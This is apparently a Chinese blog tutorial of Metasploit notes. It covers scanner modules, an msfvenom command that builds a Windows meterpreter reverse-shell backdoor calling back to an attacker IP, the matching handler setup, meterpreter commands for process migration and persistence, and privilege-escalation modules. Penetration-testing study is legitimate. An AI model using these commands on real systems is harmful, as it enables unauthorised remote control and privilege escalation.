msf常用模块功能整理

更新中

一.基础:

shell中直接输入msfconsole开始运行

  • use +模块路径 使用模块
  • search+模块关键字 用来搜索模块
  • back 返回主界面

模块中:

  • info 查看模块信息

  • show options 查看模块设置项

  • show targets 显示可选择的target(targert更像是给你选项,你去细化攻击细节,但是明明目标机器是64位系统,我选择target为64攻击不匹配,但是选择86却攻击成功,为什么呢?这个问题解决了,因为生成木马的时候会有生成64位还是32位的选项,默认是32位,也就是×86,因为木马是×86,既然x86的木马执行成功了,选择target自然也是x86

  • expolit/run 开始执行

高级设置:

set AutoRunScript migrate -f 自动迁移进程

二.信息收集:

主机存活探测:auxiliary/scanner/discovery/arp_sweep ARP 扫描auxiliary/scanner/discovery/udp_sweep UDP 扫描auxiliary/scanner/netbios/nbname NETBIOS 扫描auxiliary/scanner/snmp/snmp_enum SNMP 扫描auxiliary/scanner/smb/smb_version SMB 扫描端口扫描:auxiliary/scanner/portscan/ack TCP ACK 端口扫描auxiliary/scanner/portscan/ftpbounce FTP bounce 端口扫描auxiliary/scanner/portscan/syn SYN 端口扫描auxiliary/scanner/portscan/tcp TCP 端口扫描auxiliary/scanner/portscan/xmas TCP XMas 端口扫描

使用方法:1.用内网的机器开个代理,使kali的流量可以到达内网,然后使用模块扫描2.使用后门连接,通过session进行扫描3.在同一个内网里面可以直接扫描(一般不会有这种情况吧,除非我带着电脑潜入目标地点)这三点适用于内网渗透的很多场景

三.渗透

3.1反向后门的使用

我的话:

反弹shell是等受害机器来连接我,所以我在这里的设置,不需要去设置受害机器的ip,因为只要受害机器知道来哪里找我就行了

生成反向后门:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.43 lport=18888 -f exe >gg.exe

高亮为可设置参数,

lhost是监听机ip地址(也就是攻击者kali的ip地址)lport是监听端口(也就是攻击者准备接收反弹回来的shell的那个端口)

监听后门:

use exploit/multi/handler

use exploit/multi/handler   #通过use选择监听模块
set payload windows/meterpreter/reverse_tcp  #选择设置反弹shell的监听(这一步我有几次忽略了,导致出现错误,连接失败,所以这一步一定不要落下,设置监听的类型)
set lhost 192.168.43.43   #这里的ip和端口应该和后门代码保持一致
set lport 18888
exploit   #开始执行

meterpreter

获取到shell后,会为被控制的机器开启一个session(会话),msf可以同时监听多个session,并且在不同的session之间随意切换,黑客在session中执行命令等同于在目标主机执行命令,也可以使用msf的攻击模块通过session对目标主机进行攻击。在session中执行命令的模式也被称为meterpreter模式

session中:

 getuid #获取当前用户的权限吧,看演示里面一般是作这个用的
 migrate [进程号] #将后门进程迁移到其它进程里面,达到权限维持的效果(更不容易被发现)
 help        #可以显示在meterpreter模式下可以操作的指令列表(一部分)
 search [-d dir] [-r recurse] -f pattern   #在被控制的机器内搜索文件
 shell   #得到终端
 background     #把session放置后台
 ps    #列出所有进程,以及进程的信息(在这里可以看到pid,知道pid就可以使用kill来终止进程了)

session外:

session -l  #列出当前的所有session以及其信息
sessions -K   #关闭所有session连接,这里的k是大写
sessions -k [指定session的id]  #杀死指定id的session
sessions [id号]  #根据id号进入不同的session

3.2提权

补丁查询:

run post/windows/gather/enum_patches 查询补丁信息use post/multi/recon/local_exploit_suggester 这个模块可通过session查询当前可以用来提权的exp,(可能会失灵)

评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值
>